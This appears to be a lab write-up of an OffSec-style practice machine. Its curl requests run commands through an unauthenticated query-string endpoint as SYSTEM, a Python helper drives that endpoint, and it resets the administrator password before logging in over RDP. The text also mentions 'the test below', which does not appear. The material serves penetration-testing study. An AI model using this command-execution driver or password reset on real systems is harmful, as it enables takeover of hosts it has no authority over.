Web


Reading the Infrastructure.pdf file revealed that the web application on port 80 of the target is a temporary command endpoint: the command is supplied after the ? character at the end of the URL.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -s 'http://192.168.219.99/?'
<!doctype html><html><body>dev-api started at 2024-08-02T13:35:17
 
	<pre></pre>
</body></html>

Nothing new is returned when only the ? character is appended, so the next step is to place a command after it.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ curl -s 'http://192.168.219.99/?whoami'
<!doctype html><html><body>dev-api started at 2024-08-02T13:35:17
 
	<pre>nt authority\system
</pre>
</body></html>

The response contains nt authority\system: whatever follows the ? is executed on the host and the web service itself runs as SYSTEM, so this is unauthenticated command execution with the highest privilege on the box. This is what the PDF meant by "command".
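A small helper for driving the endpoint, added here as an example and not part of the original writeup. It assumes what the whoami request showed: the raw query string is executed and the output comes back inside the <pre> element. The target address is the one from the page and is only a default; the command is URL-encoded because spaces and metacharacters otherwise do not survive the query string.

```python
"""Send a command through the dev-api query-string endpoint and extract its output."""
import html
import re
import sys
import urllib.parse
import urllib.request

# Assumption: target taken from the page; override on the command line.
DEFAULT_BASE = "http://192.168.219.99/"

PRE_RE = re.compile(r"<pre>(.*?)</pre>", re.S)


def build_url(base: str, command: str) -> str:
    """Place the command after the ? and percent-encode it (spaces become %20).

    Assumption: the application runs the query string verbatim, as ?whoami showed.
    """
    return base.rstrip("/") + "/?" + urllib.parse.quote(command, safe="")


def parse_output(body: str) -> str:
    """Return the command output from the <pre> element, entities unescaped."""
    match = PRE_RE.search(body)
    if match is None:
        raise ValueError("no <pre> element in response; the endpoint may have changed")
    return html.unescape(match.group(1)).strip()


def run_command(command: str, base: str = DEFAULT_BASE, timeout: float = 10.0) -> str:
    """Execute one command on the target and return its output as text."""
    req = urllib.request.Request(build_url(base, command))
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_output(resp.read().decode("utf-8", errors="replace"))


# Constructed sample response, shaped like the whoami reply shown above, so the
# parser can be exercised without a live target.
SAMPLE_RESPONSE = (
    "<!doctype html><html><body>dev-api started at 2024-08-02T13:35:17\n"
    " \n\t<pre>nt authority\\system\n</pre>\n</body></html>"
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_BASE
    cmd = " ".join(sys.argv[2:]) or "whoami"
    print(run_command(cmd, target))
```

Usage: `python3 devapi.py http://192.168.219.99/ whoami`. Because the output is SYSTEM's, any command the page later relies on (such as resetting the administrator password) can be sent the same way; the exact reset command is not shown on the page, so `net user administrator qwe123`, the standard Windows command for it, is an assumption in the test below rather than something the writeup confirms.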

Since every command runs as SYSTEM, the password of the administrator account was reset to qwe123 through the endpoint, and the host was then reached over RDP:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nickel]
└─$ xfreerdp /u:administrator /p:qwe123 /v:$IP /cert:ignore /dynamic-resolution /tls-seclevel:0 

System-level compromise.